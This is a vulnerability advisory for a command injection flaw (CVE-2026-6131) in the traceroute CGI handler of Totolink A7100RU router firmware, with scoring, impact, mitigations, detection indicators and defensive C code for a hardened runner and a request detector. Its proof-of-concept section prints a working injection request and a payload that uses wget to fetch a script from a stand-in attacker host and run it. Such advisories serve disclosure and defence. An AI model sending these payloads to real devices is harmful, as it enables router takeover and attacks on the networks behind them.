Executive Summary
A critical OS command injection vulnerability (CVE-2026-6131) has been identified in the Totolink A7100RU wireless router running firmware version 7.4cu.2313_b20191024. The flaw resides in the setTracerouteCfg function of the CGI handler /cgi-bin/cstecgi.cgi. By manipulating the command argument, a remote unauthenticated attacker can inject and execute arbitrary operating system commands on the affected device.
CVSS Score: 9.8 (Critical)
CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
Vulnerability Overview
| Attribute | Value |
|---|---|
| CVE ID | CVE-2026-6131 |
| CVSS Score | 9.8 (Critical) |
| Type | OS Command Injection |
| Component | setTracerouteCfg in /cgi-bin/cstecgi.cgi |
| Attack Vector | Network |
| Attack Complexity | Low |
| Privileges Required | None |
| User Interaction | None |
| Confidentiality / Integrity / Availability | High / High / High |
| Published | 2026-04-12 |
Affected Products
| Product | Firmware Version | Status |
|---|---|---|
| Totolink A7100RU | 7.4cu.2313_b20191024 | Vulnerable — no patch available |
The Totolink A7100RU is a SOHO (small office/home office) dual-band wireless router. Devices running this firmware version whose web management interface is reachable by an attacker, whether from the WAN or from an untrusted LAN segment, are at risk; no authentication is needed to reach the vulnerable handler.
Technical Details
Vulnerability Mechanism
The /cgi-bin/cstecgi.cgi CGI handler exposes router management functions. The setTracerouteCfg function is designed to configure and initiate traceroute diagnostics. It accepts a command parameter that is passed directly to a shell execution function without sanitization or escaping, enabling injection of arbitrary OS commands through shell metacharacters.
Proof-of-Concept Attack Pattern
```http
POST /cgi-bin/cstecgi.cgi HTTP/1.1
Host: <router-ip>
Content-Type: application/x-www-form-urlencoded

action=setTracerouteCfg&command=8.8.8.8;id;
```
A payload such as `8.8.8.8;wget http://attacker.com/shell.sh -O /tmp/s;sh /tmp/s` would download and execute a remote script on the router. Depending on how the CGI parses the body, shell metacharacters may need to be percent-encoded (`;` as `%3B`, spaces as `+` or `%20`); it is the decoded value that reaches the shell, so encoding does not change the outcome.
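The mechanism above, reconstructed as an added example (this is not Totolink's firmware code, whose internals the advisory does not show): the vulnerable splice of the `command` value into a shell command line, beside a hardened replacement that validates the target against a character allowlist and executes traceroute directly with an argv array so no shell ever sees the input. The traceroute path `/usr/sbin/traceroute`, its `-n -m 10` flags, and all function names are assumptions.

```c
#include <stdio.h>
#include <string.h>
#include <unistd.h>
#include <sys/wait.h>

/* Added example, not Totolink's firmware code: an illustrative reconstruction
 * of the pattern behind setTracerouteCfg beside a hardened replacement.
 * The traceroute path and flags below are assumptions. */

#define MAX_TARGET 253  /* longest valid DNS hostname */

/* Vulnerable pattern: the user-supplied target is spliced into a shell
 * command line. Returns the exact string system() would receive, so the
 * injection is visible without executing it. */
int build_vulnerable_cmdline(const char *target, char *out, size_t outlen)
{
    int n = snprintf(out, outlen, "traceroute %s", target);
    return (n < 0 || (size_t)n >= outlen) ? -1 : 0;
}

/* Hardened check: allowlist of characters that can appear in an IPv4 or
 * IPv6 literal or a hostname. Anything else (';', '|', '&', '$', '`',
 * space, newline, quotes) is rejected outright rather than escaped. */
int is_safe_target(const char *target)
{
    size_t len = strlen(target);
    if (len == 0 || len > MAX_TARGET)
        return 0;
    for (size_t i = 0; i < len; i++) {
        char c = target[i];
        int ok = (c >= '0' && c <= '9') || (c >= 'a' && c <= 'z') ||
                 (c >= 'A' && c <= 'Z') || c == '.' || c == ':' || c == '-';
        if (!ok)
            return 0;
    }
    /* A leading '-' would be parsed by traceroute as an option. */
    return target[0] != '-';
}

/* Hardened execution: validate, then exec traceroute with an argv array.
 * No shell is involved, so metacharacters carry no meaning even if the
 * allowlist were loosened later. Returns -1 for rejected input or a
 * process error, otherwise traceroute's exit status. */
int run_traceroute_safe(const char *target)
{
    if (!is_safe_target(target))
        return -1;

    pid_t pid = fork();
    if (pid < 0)
        return -1;
    if (pid == 0) {
        char *const argv[] = { "traceroute", "-n", "-m", "10", (char *)target, NULL };
        execv("/usr/sbin/traceroute", argv);  /* assumed path */
        _exit(127);  /* only reached if execv fails */
    }
    int status = 0;
    if (waitpid(pid, &status, 0) < 0)
        return -1;
    return WIFEXITED(status) ? WEXITSTATUS(status) : -1;
}

int main(void)
{
    /* Constructed inputs: a benign target, the PoC payload, a hostname,
     * and an option-injection attempt that passes the character allowlist. */
    const char *samples[] = { "8.8.8.8", "8.8.8.8;id;", "example.com", "--help" };
    char line[512];
    for (size_t i = 0; i < sizeof samples / sizeof samples[0]; i++) {
        build_vulnerable_cmdline(samples[i], line, sizeof line);
        printf("target=%-14s shell would run: %-24s safe=%d\n",
               samples[i], line, is_safe_target(samples[i]));
    }
    return 0;
}
```

The important design choice is the second layer: even with the allowlist in place, the fixed code never hands user data to a shell, so a future validation bug cannot turn back into command execution. Escaping the input for the shell instead of rejecting it would leave that single point of failure.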
Why CVSS 9.8?
The combination of network-accessible attack vector, no authentication required, no user interaction, and full C/I/A impact yields a near-maximum CVSS score. The only reason it does not reach 10.0 is the Scope: Unchanged metric.
Impact Assessment
| Impact Area | Description |
|---|---|
| Remote Code Execution | Arbitrary command execution as the CGI process user (typically root on embedded devices) |
| Full Device Compromise | Attacker can modify router configuration, firmware, and routing tables |
| Network Pivoting | Compromised router can be used to attack internal LAN hosts |
| Botnet Recruitment | Device can be enrolled into a DDoS botnet (e.g., Mirai variants) |
| Credential Theft | Router admin credentials, Wi-Fi PSKs, and VPN configs can be extracted |
| Traffic Interception | DNS hijacking and traffic redirection affecting all devices on the network |
Recommendations
Immediate Actions
- Disable remote web management — ensure the router's admin interface is not accessible from the WAN port
- Place the router behind a firewall — restrict access to the management interface to trusted LAN hosts only
- Check for firmware updates — monitor Totolink's official support pages for a patched firmware release
- Change default admin credentials — use a strong, unique admin password to reduce exposure from adjacent vulnerabilities
- Consider replacement — if the device is end-of-life or no patch is forthcoming, replace it with a supported model
Network-Level Mitigations
- Block port 80/443 inbound on the WAN interface via upstream firewall rules
- Restrict management UI access to specific management VLAN or host IPs
- Deploy IDS/IPS signatures to detect anomalous CGI POST requests targeting setTracerouteCfg
- Monitor for unexpected outbound connections from the router's WAN IP
Detection Indicators
| Indicator | Description |
|---|---|
| Unexpected outbound HTTP(S) from router | Possible C2 beacon or payload download |
| New cron jobs or rc.d scripts | Persistence mechanisms installed post-exploitation |
| Unusual DNS responses on LAN | DNS hijacking for traffic interception |
| Router reboots or config changes | Post-exploitation configuration tampering |
| POST requests to /cgi-bin/cstecgi.cgi with shell metacharacters in the command field | Exploitation attempts in access logs or proxy captures |
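A concrete form of the last indicator, as an added example (not from the advisory, a vendor, or any IDS product): a check that runs over captured POST bodies to /cgi-bin/cstecgi.cgi, percent-decodes the form fields, and flags a setTracerouteCfg request whose command value contains shell metacharacters. It assumes the application/x-www-form-urlencoded body shape shown in the PoC; the sample bodies are constructed for illustration.

```c
#include <stdio.h>
#include <string.h>

/* Added example, not from the advisory or the vendor: a detector for
 * exploitation attempts against setTracerouteCfg, intended to run over
 * captured POST bodies (reverse-proxy logs, a WAF hook, or a pcap).
 * Assumes the form-urlencoded body layout shown in the PoC. */

/* Shell metacharacters that never belong in a traceroute target.
 * Newline and carriage return are included because they end a command. */
static const char SHELL_META[] = ";|&$`<>(){}\n\r'\"\\ ";

static int hexval(char c)
{
    if (c >= '0' && c <= '9') return c - '0';
    if (c >= 'a' && c <= 'f') return c - 'a' + 10;
    if (c >= 'A' && c <= 'F') return c - 'A' + 10;
    return -1;
}

/* Percent-decode a form value into out, mapping '+' to space. Decoding
 * first matters: an attacker can send %3B instead of ';' and a naive
 * substring match on the raw body would miss it. Returns decoded length. */
static size_t url_decode(const char *in, size_t inlen, char *out, size_t outlen)
{
    size_t o = 0;
    for (size_t i = 0; i < inlen && o + 1 < outlen; i++) {
        if (in[i] == '%' && i + 2 < inlen) {
            int h = hexval(in[i + 1]), l = hexval(in[i + 2]);
            if (h >= 0 && l >= 0) {
                out[o++] = (char)(h * 16 + l);
                i += 2;
                continue;
            }
        }
        out[o++] = (in[i] == '+') ? ' ' : in[i];
    }
    out[o] = '\0';
    return o;
}

/* Locate field `name` in a form-urlencoded body and decode its value.
 * Field order does not matter. Returns 1 if found, 0 otherwise. */
static int get_field(const char *body, const char *name, char *out, size_t outlen)
{
    size_t nlen = strlen(name);
    const char *p = body;
    while (p && *p) {
        const char *end = strchr(p, '&');
        size_t plen = end ? (size_t)(end - p) : strlen(p);
        if (plen > nlen && strncmp(p, name, nlen) == 0 && p[nlen] == '=') {
            url_decode(p + nlen + 1, plen - nlen - 1, out, outlen);
            return 1;
        }
        p = end ? end + 1 : NULL;
    }
    return 0;
}

/* Returns 1 if the body targets setTracerouteCfg with shell metacharacters
 * in the command value, 0 for a setTracerouteCfg request that looks benign,
 * and -1 if the body is not a setTracerouteCfg request at all. */
int is_traceroute_injection(const char *body)
{
    char action[64], command[512];
    if (!get_field(body, "action", action, sizeof action) ||
        strcmp(action, "setTracerouteCfg") != 0)
        return -1;
    if (!get_field(body, "command", command, sizeof command))
        return 0;
    return strpbrk(command, SHELL_META) != NULL;
}

int main(void)
{
    /* Constructed sample bodies: benign, the PoC payload, the download
     * payload with the separator percent-encoded, and an unrelated action. */
    const char *bodies[] = {
        "action=setTracerouteCfg&command=8.8.8.8",
        "action=setTracerouteCfg&command=8.8.8.8;id;",
        "action=setTracerouteCfg&command=8.8.8.8%3Bwget+http%3A%2F%2Fattacker.com%2Fshell.sh+-O+%2Ftmp%2Fs%3Bsh+%2Ftmp%2Fs",
        "action=setLedCfg&enable=1",
    };
    for (size_t i = 0; i < sizeof bodies / sizeof bodies[0]; i++)
        printf("%2d  %s\n", is_traceroute_injection(bodies[i]), bodies[i]);
    return 0;
}
```

Matching on the decoded value rather than on the raw body is the point of the example: a signature that looks for a literal `;` in the request will miss `%3B`, and one that alerts on any POST to the handler will fire on every legitimate diagnostic run.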
Post-Remediation Checklist
- Apply vendor patch when released and verify firmware integrity via checksum
- Factory reset and reconfigure the router from scratch after any suspected compromise
- Change all LAN device passwords that may have been intercepted via DNS hijacking
- Review DNS settings on all LAN devices to ensure they point to trusted resolvers
- Audit firewall rules to confirm WAN management access is blocked
Related Vulnerabilities
This CVE is part of a cluster of OS command injection vulnerabilities discovered in the same Totolink A7100RU firmware version:
- CVE-2026-6132 — OS command injection via setLedCfg (enable parameter)
- CVE-2026-6138 — OS command injection via setAccessDeviceCfg (mac parameter)
The co-discovery of multiple injection points in the same CGI handler suggests a systemic lack of input validation across this firmware's management interface.